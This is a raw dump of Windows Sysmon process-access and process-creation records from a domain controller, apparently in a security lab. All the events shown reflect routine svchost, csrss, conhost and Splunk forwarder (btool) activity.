10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001751Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001750Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001749Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001748Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001747Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001746Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001745Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001744Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001743Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0B-5F80-4300-000000007F01}4024C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001742Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3E0A-5F80-3F00-000000007F01}39443948C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{733EE690-3E0B-5F80-4300-000000007F01}4024C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001741Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.145{733EE690-3E0B-5F80-4300-000000007F01}4024C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E0A-5F80-3F00-000000007F01}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001740Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.073{733EE690-3E0A-5F80-4200-000000007F01}39964000C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001987Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0C-5F80-5300-000000007F01}4024C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001986Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001985Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001984Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001983Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001982Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001981Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001980Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001979Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001978Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E0C-5F80-5300-000000007F01}4024C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001977Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001976Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3E0C-5F80-5200-000000007F01}40404036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{733EE690-3E0C-5F80-5300-000000007F01}4024C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001975Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.969{733EE690-3E0C-5F80-5300-000000007F01}4024C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{733EE690-3E0C-5F80-5200-000000007F01}4040C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000001974Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0C-5F80-5200-000000007F01}4040C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001973Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 